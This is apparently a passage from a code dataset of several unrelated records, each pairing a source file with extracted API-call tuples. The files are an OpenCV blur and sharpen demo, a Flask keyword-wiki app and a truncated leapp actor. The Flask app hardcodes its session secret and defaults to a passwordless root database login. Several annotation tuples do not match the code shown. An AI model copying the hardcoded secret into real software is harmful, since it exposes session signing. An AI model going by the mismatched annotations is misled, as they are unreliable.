models\n'), ((8293, 8327), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (8312, 8327), False, 'from django.db import models\n'), ((8339, 8391), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)', 'default': '"""0.0.0.0/0"""'}), "(max_length=50, default='0.0.0.0/0')\n", (8355, 8391), False, 'from django.db import models\n'), ((8406, 8456), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)', 'default': '"""0.0.0.0"""'}), "(max_length=50, default='0.0.0.0')\n", (8422, 8456), False, 'from django.db import models\n'), ((8641, 8663), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {}), '()\n', (8661, 8663), False, 'from django.db import models\n'), ((8674, 8696), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {}), '()\n', (8694, 8696), False, 'from django.db import models\n'), ((8707, 8755), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Lab'], {'on_delete': 'models.CASCADE'}), '(Lab, on_delete=models.CASCADE)\n', (8724, 8755), False, 'from django.db import models\n'), ((8774, 8839), 'django.db.models.TextField', 'models.TextField', ([], {'default': '"""This lab will be down for maintenance"""'}), "(default='This lab will be down for maintenance')\n", (8790, 8839), False, 'from django.db import models\n'), ((3043, 3065), 'json.loads', 'json.loads', (['self.vlans'], {}), '(self.vlans)\n', (3053, 3065), False, 'import json\n'), ((3085, 3116), 'json.loads', 'json.loads', (['self.reserved_vlans'], {}), '(self.reserved_vlans)\n', (3095, 3116), False, 'import json\n'), ((4953, 4984), 'json.loads', 'json.loads', (['self.reserved_vlans'], {}), '(self.reserved_vlans)\n', (4963, 4984), False, 'import json\n'), ((5012, 5034), 'json.loads', 'json.loads', (['self.vlans'], {}), '(self.vlans)\n', (5022, 5034), False, 'import json\n'), ((5540, 5562), 'json.loads', 'json.loads', (['self.vlans'], {}), '(self.vlans)\n', (5550, 5562), False, 
'import json\n'), ((5735, 5755), 'json.dumps', 'json.dumps', (['my_vlans'], {}), '(my_vlans)\n', (5745, 5755), False, 'import json\n'), ((5969, 5991), 'json.loads', 'json.loads', (['self.vlans'], {}), '(self.vlans)\n', (5979, 5991), False, 'import json\n'), ((6012, 6043), 'json.loads', 'json.loads', (['self.reserved_vlans'], {}), '(self.reserved_vlans)\n', (6022, 6043), False, 'import json\n'), ((6380, 6400), 'json.dumps', 'json.dumps', (['my_vlans'], {}), '(my_vlans)\n', (6390, 6400), False, 'import json\n'), ((7799, 7845), 'django.apps.apps.get_model', 'apps.get_model', (['"""resource_inventory"""', '"""Server"""'], {}), "('resource_inventory', 'Server')\n", (7813, 7845), False, 'from django.apps import apps\n'), ((3548, 3615), 'dashboard.exceptions.ResourceAvailabilityException', 'ResourceAvailabilityException', (['"""can\'t allocate the vlans requested"""'], {}), '("can\'t allocate the vlans requested")\n', (3577, 3615), False, 'from dashboard.exceptions import ResourceAvailabilityException\n'), ((7637, 7660), 'random.choice', 'random.choice', (['alphabet'], {}), '(alphabet)\n', (7650, 7660), False, 'import random\n'), ((8028, 8046), 'collections.Counter', 'Counter', (['resources'], {}), '(resources)\n', (8035, 8046), False, 'from collections import Counter\n')] |
"""Demonstrate image blurring (averaging) and sharpening with OpenCV."""
# Import Computer Vision package - cv2
import cv2
# Import Numerical Python package - numpy as np
import numpy as np

# Load the source image from disk.
source = cv2.imread('image_6.jpg')

# Show the untouched image and block until a key press.
cv2.imshow("Original", source)
cv2.waitKey(0)

# --- Blurring ---------------------------------------------------------
# Averaging convolves the image with a normalized box filter: each output
# pixel becomes the mean of its neighbourhood.  A normalized 3x3 box would
# be (1/9) * ones(3, 3); here a 9x9 kernel is used for a stronger blur.
averaged = cv2.blur(source, (9, 9))
cv2.imshow('Blurred', averaged)
cv2.waitKey(0)

# --- Sharpening -------------------------------------------------------
# This kernel sums to 1, so overall brightness is preserved while edges
# are emphasized.  If it did not normalize to 1 the result would be
# brighter or darker accordingly.
sharpen_kernel = np.array([[-1, -1, -1],
                           [-1, 9, -1],
                           [-1, -1, -1]])
# ddepth = -1 keeps the output depth equal to the input image's depth.
crisp = cv2.filter2D(source, -1, sharpen_kernel)
cv2.imshow('Sharpened', crisp)
cv2.waitKey(0)

# Tear down all HighGUI windows.
cv2.destroyAllWindows()
| [
"cv2.filter2D",
"cv2.imshow",
"numpy.array",
"cv2.destroyAllWindows",
"cv2.waitKey",
"cv2.blur",
"cv2.imread"
] | [((218, 243), 'cv2.imread', 'cv2.imread', (['"""image_6.jpg"""'], {}), "('image_6.jpg')\n", (228, 243), False, 'import cv2\n'), ((304, 333), 'cv2.imshow', 'cv2.imshow', (['"""Original"""', 'image'], {}), "('Original', image)\n", (314, 333), False, 'import cv2\n'), ((370, 384), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (381, 384), False, 'import cv2\n'), ((704, 727), 'cv2.blur', 'cv2.blur', (['image', '(9, 9)'], {}), '(image, (9, 9))\n', (712, 727), False, 'import cv2\n'), ((780, 807), 'cv2.imshow', 'cv2.imshow', (['"""Blurred"""', 'blur'], {}), "('Blurred', blur)\n", (790, 807), False, 'import cv2\n'), ((844, 858), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (855, 858), False, 'import cv2\n'), ((924, 975), 'numpy.array', 'np.array', (['[[-1, -1, -1], [-1, 9, -1], [-1, -1, -1]]'], {}), '([[-1, -1, -1], [-1, 9, -1], [-1, -1, -1]])\n', (932, 975), True, 'import numpy as np\n'), ((1242, 1273), 'cv2.filter2D', 'cv2.filter2D', (['image', '(-1)', 'kernel'], {}), '(image, -1, kernel)\n', (1254, 1273), False, 'import cv2\n'), ((1377, 1411), 'cv2.imshow', 'cv2.imshow', (['"""Sharpened"""', 'sharpened'], {}), "('Sharpened', sharpened)\n", (1387, 1411), False, 'import cv2\n'), ((1449, 1463), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (1460, 1463), False, 'import cv2\n'), ((1488, 1511), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (1509, 1511), False, 'import cv2\n')] |
from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for
import MySQLdb.cursors
import hashlib
import html
import json
import math
import os
import pathlib
import random
import re
import string
import urllib
import sys
from werkzeug.contrib.profiler import ProfilerMiddleware, MergeStream
# Serve ../public as the static root, mounted at the URL root.
static_folder = pathlib.Path(__file__).resolve().parent.parent / 'public'
app = Flask(__name__, static_folder=str(static_folder), static_url_path='')
app.secret_key = 'tonymoris'
# Profile every request, merging profiler output to stdout and a log file.
# NOTE(review): the file handle is deliberately left open for the process
# lifetime so the middleware can keep writing to it.
f = open('/home/isucon/profiler.log', 'w')
stream = MergeStream(sys.stdout, f)
app.config['PROFILE'] = True
app.wsgi_app = ProfilerMiddleware(app.wsgi_app, stream, sort_by=('time', 'calls'))
# In-process caches: the set of all keywords, and the compiled alternation
# regex built from them.  Both are invalidated by the create/delete handlers.
keywords_cache = None
keyword_re_cache = None
# app.logger.critical('this is a CRITICAL message')
# Connection settings for the isuda database and the sibling services,
# read from the environment with local-development defaults.
_config = {
    'db_host': os.environ.get('ISUDA_DB_HOST', 'localhost'),
    'db_port': int(os.environ.get('ISUDA_DB_PORT', '3306')),
    'db_user': os.environ.get('ISUDA_DB_USER', 'root'),
    'db_password': os.environ.get('ISUDA_DB_PASSWORD', ''),
    'isutar_origin': os.environ.get('ISUTAR_ORIGIN', 'http://localhost:5001'),
    'isupam_origin': os.environ.get('ISUPAM_ORIGIN', 'http://localhost:5050'),
}
def config(key):
    """Return the configuration value registered under *key*.

    Raises:
        KeyError: if *key* is not a known configuration entry.  (The
            original raised a plain string, which is itself a TypeError
            on Python 3.)
    """
    try:
        return _config[key]
    except KeyError:
        raise KeyError("config value of %s undefined" % key)
def dbh_isuda():
    """Return a per-request MySQL connection to the ``isuda`` database.

    The connection is opened lazily on first use, configured for utf8mb4
    and a strict SQL mode, and cached on the Flask ``request`` object.
    """
    if not hasattr(request, 'isuda_db'):
        request.isuda_db = MySQLdb.connect(
            host=config('db_host'),
            port=config('db_port'),
            user=config('db_user'),
            passwd=config('db_password'),
            db='isuda',
            charset='utf8mb4',
            cursorclass=MySQLdb.cursors.DictCursor,
            autocommit=True,
        )
        cur = request.isuda_db.cursor()
        cur.execute("SET SESSION sql_mode='TRADITIONAL,NO_AUTO_VALUE_ON_ZERO,ONLY_FULL_GROUP_BY'")
        cur.execute('SET NAMES utf8mb4')
    return request.isuda_db
def dbh_isutar():
    """Return a per-request MySQL connection to the ``isutar`` database.

    Opened lazily from environment settings, configured like the isuda
    connection, and cached on the Flask ``request`` object.
    """
    if not hasattr(request, 'isutar_db'):
        request.isutar_db = MySQLdb.connect(
            host=os.environ.get('ISUTAR_DB_HOST', 'localhost'),
            port=int(os.environ.get('ISUTAR_DB_PORT', '3306')),
            user=os.environ.get('ISUTAR_DB_USER', 'root'),
            passwd=os.environ.get('ISUTAR_DB_PASSWORD', ''),
            db='isutar',
            charset='utf8mb4',
            cursorclass=MySQLdb.cursors.DictCursor,
            autocommit=True,
        )
        cur = request.isutar_db.cursor()
        cur.execute("SET SESSION sql_mode='TRADITIONAL,NO_AUTO_VALUE_ON_ZERO,ONLY_FULL_GROUP_BY'")
        cur.execute('SET NAMES utf8mb4')
    return request.isutar_db
@app.teardown_request
def close_db(exception=None):
    """Close any per-request DB connections after the request ends.

    The original tested ``request.db``, an attribute that is never set
    anywhere in this file, so the connections cached by dbh_isuda() and
    dbh_isutar() were never closed and leaked on every request.
    """
    for attr in ('isuda_db', 'isutar_db'):
        conn = getattr(request, attr, None)
        if conn is not None:
            conn.close()
@app.template_filter()
def ucfirst(s):
    """Upper-case the first character of *s*, leaving the rest untouched.

    Fixes two defects in the original ``str[0].upper() + str[-len(str) + 1:]``:
    a one-character string was doubled ('a' -> 'AA', since ``str[0:]`` is the
    whole string) and an empty string raised IndexError.  The parameter is
    also renamed so it no longer shadows the ``str`` builtin (templates pass
    it positionally).
    """
    if not s:
        return s
    return s[0].upper() + s[1:]
def set_name(func):
    """Decorator that loads the logged-in user (if any) onto ``request``.

    When the session carries a ``user_id``, ``request.user_id`` and
    ``request.user_name`` are populated before the view runs; an unknown
    id aborts with 403.  Anonymous requests pass through untouched.
    """
    import functools

    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        if "user_id" not in session:
            return func(*args, **kwargs)
        uid = session['user_id']
        request.user_id = uid
        cur = dbh_isuda().cursor()
        cur.execute('SELECT name FROM user WHERE id = %s', (uid, ))
        row = cur.fetchone()
        if row is None:
            abort(403)
        request.user_name = row['name']
        return func(*args, **kwargs)
    return wrapper
def authenticate(func):
    """Decorator that rejects requests without a resolved user (403).

    Relies on @set_name having stored ``request.user_id`` beforehand.
    """
    import functools

    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        if hasattr(request, 'user_id'):
            return func(*args, **kwargs)
        abort(403)
    return wrapper
@app.route('/initialize')
def get_initialize():
    """Benchmark hook: drop caches, trim seed data, and reset isutar."""
    global keywords_cache
    global keyword_re_cache
    keywords_cache = None
    keyword_re_cache = None
    cur = dbh_isuda().cursor()
    cur.execute('DELETE FROM entry WHERE id > 7101')
    # Ask the companion isutar service to reset itself as well.
    urllib.request.urlopen(config('isutar_origin') + '/initialize')
    return jsonify(result='ok')
@app.route('/')
@set_name
def get_index():
    """Front page: a paginated list of entries, newest first."""
    PER_PAGE = 10
    current = int(request.args.get('page', '1'))
    cur = dbh_isuda().cursor()
    cur.execute('SELECT * FROM entry ORDER BY updated_at DESC LIMIT %s OFFSET %s', (PER_PAGE, PER_PAGE * (current - 1),))
    rows = cur.fetchall()
    # Render each entry body to HTML and attach its star list.
    for row in rows:
        row['html'] = htmlify(row['description'])
        row['stars'] = load_stars(row['keyword'])
    cur.execute('SELECT COUNT(*) AS count FROM entry')
    total = cur.fetchone()['count']
    last_page = int(math.ceil(total / PER_PAGE))
    # Window of up to 5 page links on either side of the current page.
    pages = range(max(1, current - 5), min(last_page, current + 5) + 1)
    return render_template('index.html', entries=rows, page=current, last_page=last_page, pages=pages)
@app.route('/robots.txt')
def get_robot_txt():
    # No robots.txt is served; always answer 404.
    abort(404)
@app.route('/keyword', methods=['POST'])
@set_name
@authenticate
def create_keyword():
    """Create or update a keyword entry owned by the logged-in user.

    Aborts 400 on an empty keyword or when either the keyword or the
    description is judged spam by isupam.
    """
    global keywords_cache
    global keyword_re_cache
    keyword = request.form['keyword']
    if keyword is None or len(keyword) == 0:
        abort(400)
    user_id = request.user_id
    description = request.form['description']
    if is_spam_contents(description) or is_spam_contents(keyword):
        abort(400)
    cur = dbh_isuda().cursor()
    sql = """
        INSERT INTO entry (author_id, keyword, description, created_at, updated_at)
        VALUES (%s,%s,%s,NOW(), NOW())
        ON DUPLICATE KEY UPDATE
        author_id = %s, keyword = %s, description = %s, updated_at = NOW()
    """
    cur.execute(sql, (user_id, keyword, description, user_id, keyword, description))
    # Only update the in-process keyword cache once the row is actually
    # persisted.  The original mutated the cache before spam validation, so
    # a rejected (400) request still poisoned the cache with a keyword that
    # has no entry behind it.
    if keywords_cache is not None:
        keywords_cache.add(keyword)
        keyword_re_cache = None
    return redirect('/')
@app.route('/register')
@set_name
def get_register():
    """Render the sign-up form (shares a template with the login page)."""
    return render_template('authenticate.html', action='register')
@app.route('/register', methods=['POST'])
def post_register():
    """Create an account from the posted form and start a session.

    Aborts 400 when either the name or the password is missing/empty.
    """
    username = request.form['name']
    password = request.form['password']
    if not username or not password:
        abort(400)
    session['user_id'] = register(dbh_isuda().cursor(), username, password)
    return redirect('/')
def register(cur, user, password):
    """Insert a new user row and return its id.

    The stored password is sha1(salt + password).  The original hashed the
    literal string "password" instead of the supplied argument, so the
    stored hash never matched what post_login computes (salt + submitted
    password) and no newly registered user could ever log in.
    """
    salt = random_string(20)
    cur.execute(
        "INSERT INTO user (name, salt, password, created_at) VALUES (%s, %s, %s, NOW())",
        (user, salt, hashlib.sha1((salt + password).encode('utf-8')).hexdigest(),))
    cur.execute("SELECT LAST_INSERT_ID() AS last_insert_id")
    return cur.fetchone()['last_insert_id']


def random_string(n):
    """Return a random alphanumeric string of length *n* (used as a salt)."""
    return ''.join([random.choice(string.ascii_letters + string.digits) for i in range(n)])
@app.route('/login')
@set_name
def get_login():
    """Render the login form (shares a template with the sign-up page)."""
    return render_template('authenticate.html', action='login')
@app.route('/login', methods=['POST'])
def post_login():
    """Validate credentials and start a session; 403 on any mismatch."""
    cur = dbh_isuda().cursor()
    cur.execute("SELECT * FROM user WHERE name = %s", (request.form['name'], ))
    user = cur.fetchone()
    if user is None:
        abort(403)
    # Stored hash is sha1(salt + password); recompute it from the form.
    submitted = hashlib.sha1((user['salt'] + request.form['password']).encode('utf-8')).hexdigest()
    if user['password'] != submitted:
        abort(403)
    session['user_id'] = user['id']
    return redirect('/')
@app.route('/logout')
def get_logout():
    """Log out by dropping the session's user id, then go home."""
    session.pop('user_id', None)
    return redirect('/')
@app.route('/keyword/<keyword>')
@set_name
def get_keyword(keyword):
    """Show one keyword entry, rendered with cross-links and its stars.

    400 on an empty keyword, 404 when no such entry exists.
    """
    if keyword == '':
        abort(400)
    cur = dbh_isuda().cursor()
    cur.execute('SELECT * FROM entry WHERE keyword = %s', (keyword,))
    row = cur.fetchone()
    if row is None:
        abort(404)
    row['html'] = htmlify(row['description'])
    row['stars'] = load_stars(row['keyword'])
    return render_template('keyword.html', entry=row)
@app.route('/keyword/<keyword>', methods=['POST'])
@set_name
@authenticate
def delete_keyword(keyword):
    """Delete a keyword entry; 400 on empty name, 404 if it does not exist."""
    global keywords_cache
    global keyword_re_cache
    if keyword == '':
        abort(400)
    cur = dbh_isuda().cursor()
    cur.execute('SELECT keyword FROM entry WHERE keyword = %s', (keyword, ))
    row = cur.fetchone()
    if row is None:
        abort(404)
    cur.execute('DELETE FROM entry WHERE keyword = %s', (keyword,))
    # Evict from the in-process cache only after the row is really gone.
    # The original evicted before the existence check, so a request that
    # 404'd could still invalidate the cache.
    if keywords_cache is not None and keyword in keywords_cache:
        keywords_cache.remove(keyword)
        keyword_re_cache = None
    return redirect('/')
def make_keyword_list():
    """Return all keywords ordered longest-first.

    The longest-first order matters: make_keyword_re() joins these into a
    regex alternation, and an earlier short keyword would otherwise match
    inside a longer one.  The original returned ``list(keywords_cache)`` on
    a cache hit — a set in arbitrary order — silently breaking that
    guarantee; re-sort on the way out instead.
    """
    global keywords_cache
    if keywords_cache is not None:
        return sorted(keywords_cache, key=len, reverse=True)
    cur = dbh_isuda().cursor()
    cur.execute('SELECT keyword FROM entry ORDER BY CHARACTER_LENGTH(keyword) DESC')
    keywords = [row['keyword'] for row in cur.fetchall()]
    # Cache as a set so create/delete handlers can add/remove in O(1).
    keywords_cache = set(keywords)
    return keywords
def make_keyword_re(keywords):
    """Return (and cache) one alternation regex matching any keyword."""
    global keyword_re_cache
    if keyword_re_cache is None:
        escaped = '|'.join(re.escape(word) for word in keywords)
        keyword_re_cache = re.compile("(%s)" % escaped)
    return keyword_re_cache
def htmlify(content):
    """Render entry text to HTML: escape it, link every known keyword,
    and turn newlines into <br /> tags.

    Keyword occurrences are first replaced with sha1-based placeholders so
    html.escape() cannot mangle the link markup that is swapped in
    afterwards.
    """
    if content is None or content == '':
        return ''
    keywords = make_keyword_list()
    keyword_re = make_keyword_re(keywords)
    kw2sha = {}

    def replace_keyword(m):
        kw2sha[m.group(0)] = "isuda_%s" % hashlib.sha1(m.group(0).encode('utf-8')).hexdigest()
        return kw2sha[m.group(0)]

    result = re.sub(keyword_re, replace_keyword, content)
    result = html.escape(result)
    for kw, placeholder in kw2sha.items():
        url = url_for('get_keyword', keyword=kw)
        link = "<a href=\"%s\">%s</a>" % (url, html.escape(kw))
        # str.replace instead of the original re.sub(re.compile(hash), ...):
        # the placeholder is a plain token, and re.sub would interpret
        # backslashes in the link text as backreferences.  Also avoids
        # shadowing the hash() builtin.
        result = result.replace(placeholder, link)
    return result.replace("\n", "<br />")
def get_stars(keyword):
    """Fetch star rows for *keyword* directly from the isutar database."""
    cur = dbh_isutar().cursor()
    app.logger.critical('keyword = ' + keyword)
    cur.execute('SELECT * FROM star WHERE keyword = %s', (keyword, ))
    return cur.fetchall()
def load_stars(keyword):
    """Ask the isutar HTTP service for the stars attached to *keyword*."""
    query = urllib.parse.urlencode({'keyword': keyword})
    endpoint = "%s/stars" % config('isutar_origin')
    with urllib.request.urlopen(endpoint + "?%s" % query) as res:
        payload = json.loads(res.read().decode('utf-8'))
    return payload['stars']
def is_spam_contents(content):
    """Return True when the isupam service judges *content* to be spam.

    The original ended with an unreachable ``return False`` after the
    ``with`` block (the block always returns); that dead code is removed.
    """
    body = urllib.parse.urlencode({"content": content}).encode('utf-8')
    with urllib.request.urlopen(config('isupam_origin'), body) as res:
        data = json.loads(res.read().decode('utf-8'))
        return not data['valid']
if __name__ == "__main__":
app.run()
| [
"flask.render_template",
"flask.request.args.get",
"re.escape",
"re.compile",
"flask.request.isuda_db.cursor",
"urllib.parse.urlencode",
"flask.session.pop",
"html.escape",
"flask.jsonify",
"flask.request.isutar_db.cursor",
"werkzeug.contrib.profiler.MergeStream",
"pathlib.Path",
"functools.... | [((560, 586), 'werkzeug.contrib.profiler.MergeStream', 'MergeStream', (['sys.stdout', 'f'], {}), '(sys.stdout, f)\n', (571, 586), False, 'from werkzeug.contrib.profiler import ProfilerMiddleware, MergeStream\n'), ((631, 698), 'werkzeug.contrib.profiler.ProfilerMiddleware', 'ProfilerMiddleware', (['app.wsgi_app', 'stream'], {'sort_by': "('time', 'calls')"}), "(app.wsgi_app, stream, sort_by=('time', 'calls'))\n", (649, 698), False, 'from werkzeug.contrib.profiler import ProfilerMiddleware, MergeStream\n'), ((836, 880), 'os.environ.get', 'os.environ.get', (['"""ISUDA_DB_HOST"""', '"""localhost"""'], {}), "('ISUDA_DB_HOST', 'localhost')\n", (850, 880), False, 'import os\n'), ((970, 1009), 'os.environ.get', 'os.environ.get', (['"""ISUDA_DB_USER"""', '"""root"""'], {}), "('ISUDA_DB_USER', 'root')\n", (984, 1009), False, 'import os\n'), ((1032, 1071), 'os.environ.get', 'os.environ.get', (['"""ISUDA_DB_PASSWORD"""', '""""""'], {}), "('ISUDA_DB_PASSWORD', '')\n", (1046, 1071), False, 'import os\n'), ((1094, 1150), 'os.environ.get', 'os.environ.get', (['"""ISUTAR_ORIGIN"""', '"""http://localhost:5001"""'], {}), "('ISUTAR_ORIGIN', 'http://localhost:5001')\n", (1108, 1150), False, 'import os\n'), ((1173, 1229), 'os.environ.get', 'os.environ.get', (['"""ISUPAM_ORIGIN"""', '"""http://localhost:5050"""'], {}), "('ISUPAM_ORIGIN', 'http://localhost:5050')\n", (1187, 1229), False, 'import os\n'), ((3077, 3098), 'functools.wraps', 'functools.wraps', (['func'], {}), '(func)\n', (3092, 3098), False, 'import functools\n'), ((3585, 3606), 'functools.wraps', 'functools.wraps', (['func'], {}), '(func)\n', (3600, 3606), False, 'import functools\n'), ((4049, 4095), 'urllib.request.urlopen', 'urllib.request.urlopen', (["(origin + '/initialize')"], {}), "(origin + '/initialize')\n", (4071, 4095), False, 'import urllib\n'), ((4107, 4127), 'flask.jsonify', 'jsonify', ([], {'result': '"""ok"""'}), "(result='ok')\n", (4114, 4127), False, 'from flask import Flask, request, jsonify, 
abort, render_template, redirect, session, url_for\n'), ((4800, 4896), 'flask.render_template', 'render_template', (['"""index.html"""'], {'entries': 'entries', 'page': 'page', 'last_page': 'last_page', 'pages': 'pages'}), "('index.html', entries=entries, page=page, last_page=\n last_page, pages=pages)\n", (4815, 4896), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((4945, 4955), 'flask.abort', 'abort', (['(404)'], {}), '(404)\n', (4950, 4955), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((5840, 5853), 'flask.redirect', 'redirect', (['"""/"""'], {}), "('/')\n", (5848, 5853), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((5921, 5976), 'flask.render_template', 'render_template', (['"""authenticate.html"""'], {'action': '"""register"""'}), "('authenticate.html', action='register')\n", (5936, 5976), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((6288, 6301), 'flask.redirect', 'redirect', (['"""/"""'], {}), "('/')\n", (6296, 6301), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((6842, 6894), 'flask.render_template', 'render_template', (['"""authenticate.html"""'], {'action': '"""login"""'}), "('authenticate.html', action='login')\n", (6857, 6894), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((7297, 7310), 'flask.redirect', 'redirect', (['"""/"""'], {}), "('/')\n", (7305, 7310), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((7357, 7385), 'flask.session.pop', 'session.pop', (['"""user_id"""', 'None'], {}), "('user_id', None)\n", (7368, 7385), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, 
url_for\n'), ((7397, 7410), 'flask.redirect', 'redirect', (['"""/"""'], {}), "('/')\n", (7405, 7410), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((7805, 7849), 'flask.render_template', 'render_template', (['"""keyword.html"""'], {'entry': 'entry'}), "('keyword.html', entry=entry)\n", (7820, 7849), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((8437, 8450), 'flask.redirect', 'redirect', (['"""/"""'], {}), "('/')\n", (8445, 8450), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((9577, 9621), 're.sub', 're.sub', (['keyword_re', 'replace_keyword', 'content'], {}), '(keyword_re, replace_keyword, content)\n', (9583, 9621), False, 'import re\n'), ((9635, 9654), 'html.escape', 'html.escape', (['result'], {}), '(result)\n', (9646, 9654), False, 'import html\n'), ((10389, 10433), 'urllib.parse.urlencode', 'urllib.parse.urlencode', (["{'keyword': keyword}"], {}), "({'keyword': keyword})\n", (10411, 10433), False, 'import urllib\n'), ((907, 946), 'os.environ.get', 'os.environ.get', (['"""ISUDA_DB_PORT"""', '"""3306"""'], {}), "('ISUDA_DB_PORT', '3306')\n", (921, 946), False, 'import os\n'), ((1844, 1869), 'flask.request.isuda_db.cursor', 'request.isuda_db.cursor', ([], {}), '()\n', (1867, 1869), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((2625, 2651), 'flask.request.isutar_db.cursor', 'request.isutar_db.cursor', ([], {}), '()\n', (2649, 2651), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((2918, 2936), 'flask.request.db.close', 'request.db.close', ([], {}), '()\n', (2934, 2936), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((4206, 4235), 'flask.request.args.get', 'request.args.get', (['"""page"""', 
'"""1"""'], {}), "('page', '1')\n", (4222, 4235), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((4685, 4720), 'math.ceil', 'math.ceil', (['(total_entries / PER_PAGE)'], {}), '(total_entries / PER_PAGE)\n', (4694, 4720), False, 'import math\n'), ((5190, 5200), 'flask.abort', 'abort', (['(400)'], {}), '(400)\n', (5195, 5200), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((5453, 5463), 'flask.abort', 'abort', (['(400)'], {}), '(400)\n', (5458, 5463), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((6177, 6187), 'flask.abort', 'abort', (['(400)'], {}), '(400)\n', (6182, 6187), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((7239, 7249), 'flask.abort', 'abort', (['(403)'], {}), '(403)\n', (7244, 7249), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((7512, 7522), 'flask.abort', 'abort', (['(400)'], {}), '(400)\n', (7517, 7522), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((7682, 7692), 'flask.abort', 'abort', (['(404)'], {}), '(404)\n', (7687, 7692), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((8040, 8050), 'flask.abort', 'abort', (['(400)'], {}), '(400)\n', (8045, 8050), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((8345, 8355), 'flask.abort', 'abort', (['(404)'], {}), '(404)\n', (8350, 8355), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((9705, 9739), 'flask.url_for', 'url_for', (['"""get_keyword"""'], {'keyword': 'kw'}), "('get_keyword', keyword=kw)\n", (9712, 9739), False, 'from flask import Flask, request, jsonify, 
abort, render_template, redirect, session, url_for\n'), ((9879, 9895), 're.compile', 're.compile', (['"""\n"""'], {}), "('\\n')\n", (9889, 9895), False, 'import re\n'), ((10443, 10487), 'urllib.request.urlopen', 'urllib.request.urlopen', (["(url + '?%s' % params)"], {}), "(url + '?%s' % params)\n", (10465, 10487), False, 'import urllib\n'), ((3697, 3707), 'flask.abort', 'abort', (['(403)'], {}), '(403)\n', (3702, 3707), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((6709, 6760), 'random.choice', 'random.choice', (['(string.ascii_letters + string.digits)'], {}), '(string.ascii_letters + string.digits)\n', (6722, 6760), False, 'import random\n'), ((9828, 9844), 're.compile', 're.compile', (['hash'], {}), '(hash)\n', (9838, 9844), False, 'import re\n'), ((3419, 3429), 'flask.abort', 'abort', (['(403)'], {}), '(403)\n', (3424, 3429), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((9787, 9802), 'html.escape', 'html.escape', (['kw'], {}), '(kw)\n', (9798, 9802), False, 'import html\n'), ((343, 365), 'pathlib.Path', 'pathlib.Path', (['__file__'], {}), '(__file__)\n', (355, 365), False, 'import pathlib\n'), ((2211, 2256), 'os.environ.get', 'os.environ.get', (['"""ISUTAR_DB_HOST"""', '"""localhost"""'], {}), "('ISUTAR_DB_HOST', 'localhost')\n", (2225, 2256), False, 'import os\n'), ((2345, 2385), 'os.environ.get', 'os.environ.get', (['"""ISUTAR_DB_USER"""', '"""root"""'], {}), "('ISUTAR_DB_USER', 'root')\n", (2359, 2385), False, 'import os\n'), ((2409, 2449), 'os.environ.get', 'os.environ.get', (['"""ISUTAR_DB_PASSWORD"""', '""""""'], {}), "('ISUTAR_DB_PASSWORD', '')\n", (2423, 2449), False, 'import os\n'), ((9019, 9031), 're.escape', 're.escape', (['k'], {}), '(k)\n', (9028, 9031), False, 'import re\n'), ((10669, 10713), 'urllib.parse.urlencode', 'urllib.parse.urlencode', (["{'content': content}"], {}), "({'content': content})\n", (10691, 10713), False, 
'import urllib\n'), ((2282, 2322), 'os.environ.get', 'os.environ.get', (['"""ISUTAR_DB_PORT"""', '"""3306"""'], {}), "('ISUTAR_DB_PORT', '3306')\n", (2296, 2322), False, 'import os\n')] |
from leapp.actors import Actor
from leapp.models import InstalledRedHatSignedRPM
from leapp.libraries.common.rpms import has_package
from leapp.reporting import Report, create_report
from leapp import reporting
from leapp.tags import ChecksPhaseTag, IPUWorkflowTag
class CheckAcpid(Actor):
    """
    Check whether the acpid package is present and, if so, report the
    incompatible behavioural changes coming in the next major version.
    """

    name = 'checkacpid'
    consumes = (InstalledRedHatSignedRPM,)
    produces = (Report,)
    tags = (ChecksPhaseTag, IPUWorkflowTag)

    def process(self):
        # Nothing to report on systems without acpid installed.
        if not has_package(InstalledRedHatSignedRPM, 'acpid'):
            return
        report_fields = [
            reporting.Title('Acpid incompatible changes in the next major version'),
